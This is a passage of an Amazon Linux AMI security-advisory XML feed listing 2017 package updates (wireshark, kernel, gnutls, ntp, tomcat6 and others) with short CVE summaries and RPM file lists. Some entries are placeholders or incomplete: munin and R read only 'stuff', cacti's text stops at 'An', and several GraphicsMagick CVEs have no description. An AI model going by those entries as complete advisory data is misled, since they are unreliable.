arch="i686"><filename>Packages/php70-enchant-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.16-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-813</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-813: medium priority package update for wireshark</title><issued date="2017-04-04 12:00:00" /><updated date="2017-04-04 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3813:
A flaw was found in the way the packet reassembly code of wireshark parsed a packet, which could leak memory. An attacker could use this flaw to crash wireshark by sending a specially crafted packet onto the wire or by convincing a wireshark user to read a malformed packet trace file.
1222438:
CVE-2015-3813 wireshark: Reassembly memory leak (wnpa-sec-2015-16)
CVE-2015-3812:
A flaw was found in the X11 dissector of wireshark through which an attacker could make wireshark consume excessive CPU resources, which could make the system unresponsive, by injecting a specially crafted packet onto the wire or by convincing a wireshark user to read a malformed packet trace file.
1222437:
CVE-2015-3812 wireshark: X11 memory leak (wnpa-sec-2015-15)
CVE-2015-3811:
A flaw was found in the WCP dissector of wireshark through which an attacker could crash wireshark by injecting a specially crafted packet onto the wire or by convincing a wireshark user to read a malformed packet trace file.
1222436:
CVE-2015-3811 wireshark: WCP dissector crash (wnpa-sec-2015-14)
CVE-2013-4075:
A flaw was found in the GMR (Geo-Mobile Radio) 1 BCCH protocol dissector of wireshark through which an attacker can trigger a denial of service and crash wireshark by sending a specially crafted packet onto the wire or by convincing a wireshark user to read a malformed packet trace file.
972680:
CVE-2013-4075 wireshark: DoS (crash) in the GMR-1 BCCH dissector (wnpa-sec-2013-33)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4075" title="" id="CVE-2013-4075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3811" title="" id="CVE-2015-3811" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3812" title="" id="CVE-2015-3812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3813" title="" id="CVE-2015-3813" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-debuginfo" version="1.8.10" release="25.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-25.22.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="25.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-25.22.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-25.22.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.22.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-25.22.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="25.22.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-25.22.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="25.22.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-25.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-814</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-814: medium priority package update for kernel</title><issued date="2017-04-06 21:16:00" /><updated date="2017-04-17 16:35:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6353:
It was found that the code in net/sctp/socket.c in the Linux kernel through 4.10.1 does not properly restrict association peel-off operations during certain wait states, which allows local users to cause a denial of service (invalid unlock and double free) via a multithreaded application. This vulnerability was introduced by the CVE-2017-5986 fix (commit 2dcab5984841).
1428907:
CVE-2017-6353 kernel: Possible double free in stcp_sendmsg() (incorrect fix for CVE-2017-5986)
CVE-2017-5986:
It was reported that with the Linux kernel, earlier than version v4.10-rc8, an application may trigger a BUG_ON in sctp_wait_for_sndbuf if the socket tx buffer is full, a thread is waiting on it to queue more data, and meanwhile another thread peels off the association being used by the first thread.
1420276:
CVE-2017-5986 kernel: Reachable BUG_ON from userspace in sctp_wait_for_sndbuf
CVE-2017-5669:
The do_shmat function in ipc/shm.c in the Linux kernel, through 4.9.12, does not restrict the address calculated by a certain rounding operation. This allows privileged local users to map page zero and, consequently, bypass a protection mechanism that exists for the mmap system call. This is possible by making crafted shmget and shmat system calls in a privileged context.
1427239:
CVE-2017-5669 kernel: Shmat allows mmap null page protection bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5669" title="" id="CVE-2017-5669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5986" title="" id="CVE-2017-5986" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6353" title="" id="CVE-2017-6353" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.20" release="10.30.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.20" release="10.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-devel-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.20" release="10.30.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.20-10.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-815</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-815: medium priority package update for gnutls</title><issued date="2017-04-06 21:21:00" /><updated date="2017-04-17 16:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5337:
* Multiple flaws were found in the way gnutls processed OpenPGP certificates. An attacker could create specially crafted OpenPGP certificates which, when parsed by gnutls, would cause it to crash.
CVE-2017-5336:
* Multiple flaws were found in the way gnutls processed OpenPGP certificates. An attacker could create specially crafted OpenPGP certificates which, when parsed by gnutls, would cause it to crash.
CVE-2017-5335:
* Multiple flaws were found in the way gnutls processed OpenPGP certificates. An attacker could create specially crafted OpenPGP certificates which, when parsed by gnutls, would cause it to crash.
CVE-2016-8610:
* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8610" title="" id="CVE-2016-8610" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5335" title="" id="CVE-2017-5335" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5336" title="" id="CVE-2017-5336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5337" title="" id="CVE-2017-5337" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:0574.html" title="" id="RHSA-2017:0574" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-guile" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.12.23" release="21.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/gnutls-guile-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.12.23-21.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-816</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-816: medium priority package update for ntp</title><issued date="2017-04-20 05:54:00" /><updated date="2017-04-20 20:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6464:
A vulnerability was discovered in the NTP server&#039;s parsing of configuration directives. A remote, authenticated attacker could cause ntpd to crash by sending a crafted message.
1433987:
CVE-2017-6464 ntp: Denial of Service via Malformed Config
CVE-2017-6463:
A vulnerability was discovered in the NTP server&#039;s parsing of configuration directives. A remote, authenticated attacker could cause ntpd to crash by sending a crafted message.
1434002:
CVE-2017-6463 ntp: Authenticated DoS via Malicious Config Option
CVE-2017-6462:
A vulnerability was found in NTP, in the parsing of packets from the /dev/datum device. A malicious device could send crafted messages, causing ntpd to crash.
1433995:
CVE-2017-6462 ntp: Buffer Overflow in DPTS Clock
CVE-2017-6458:
A vulnerability was found in NTP, in the building of response packets with custom fields. If custom fields were configured in ntp.conf with particularly long names, inclusion of these fields in the response packet could cause a buffer overflow, leading to a crash.
1434005:
CVE-2017-6458 ntp: Potential Overflows in ctl_put() functions
CVE-2017-6451:
A vulnerability was found in NTP, in the legacy MX4200 refclock implementation. If this refclock was compiled in and used, an attacker may be able to induce a stack overflow, leading to a crash or potential code execution.
1434011:
CVE-2017-6451 ntp: Improper use of snprintf() in mx4200_send()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6451" title="" id="CVE-2017-6451" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6458" title="" id="CVE-2017-6458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6462" title="" id="CVE-2017-6462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6463" title="" id="CVE-2017-6463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6464" title="" id="CVE-2017-6464" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntpdate" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-44.34.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-44.34.amzn1.noarch.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-44.34.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-44.34.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-44.34.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-44.34.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-44.34.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="44.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-44.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-817</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-817: medium priority package update for cacti</title><issued date="2017-04-20 05:59:00" /><updated date="2017-04-20 22:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4000:
CVE-2014-4000
An
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4000" title="" id="CVE-2014-4000" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.0.4" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.0.4-1.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-818</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-818: medium priority package update for munin</title><issued date="2017-04-20 06:03:00" /><updated date="2017-04-20 22:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6188:
stuff
CVE-2017-6188
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6188" title="" id="CVE-2017-6188" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="munin-cgi" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-cgi-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-ruby-plugins" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-ruby-plugins-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-netip-plugins" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-netip-plugins-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-common" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-nginx" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-nginx-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-async" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.30-5.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-819</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2017-819: medium priority package update for R</title><issued date="2017-04-20 06:04:00" /><updated date="2017-04-20 22:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8714:
stuff
1363982: stuff
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8714" title="" id="CVE-2017-8714" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="R-core-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-debuginfo" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-debuginfo-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-java-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="libRmath" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-java" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="libRmath-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-core" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="libRmath-static" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-static-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-core" version="3.3.3" release="1.51.amzn1" epoch="0" 
arch="i686"><filename>Packages/R-core-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-java-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-core-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-core-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-debuginfo" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-debuginfo-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-java" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="libRmath-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="libRmath-static" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-static-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="libRmath" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-3.3.3-1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-820</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-820: medium priority package update for GraphicsMagick</title><issued date="2017-04-20 06:08:00" /><updated date="2017-04-20 21:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2017-6335:
The QuantumTransferMode function in coders/tiff.c in GraphicsMagick 1.3.25 and earlier allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a small samples per pixel value in a CMYKA TIFF file.
1427975:
CVE-2017-6335 ImageMagick: Heap out-of-bounds read in tiff.c
CVE-2016-9830:
CVE-2016-8684:
CVE-2016-8683:
CVE-2016-8682:
CVE-2016-7997:
CVE-2016-7996:
CVE-2016-7800:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7800" title="" id="CVE-2016-7800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7996" title="" id="CVE-2016-7996" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7997" title="" id="CVE-2016-7997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8682" title="" id="CVE-2016-8682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8683" title="" id="CVE-2016-8683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8684" title="" id="CVE-2016-8684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9830" title="" id="CVE-2016-9830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6335" title="" id="CVE-2017-6335" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.25" release="6.10.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.25-6.10.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="6.10.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/GraphicsMagick-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.25-6.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-821</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-821: important priority package update for tomcat6</title><issued date="2017-04-20 06:17:00" /><updated date="2017-04-20 21:55:00" /><severity>important</severity><description>Package updates are 
available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5647:
A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.
1441205:
CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5647" title="" id="CVE-2017-5647" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-docs-webapp" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.53" 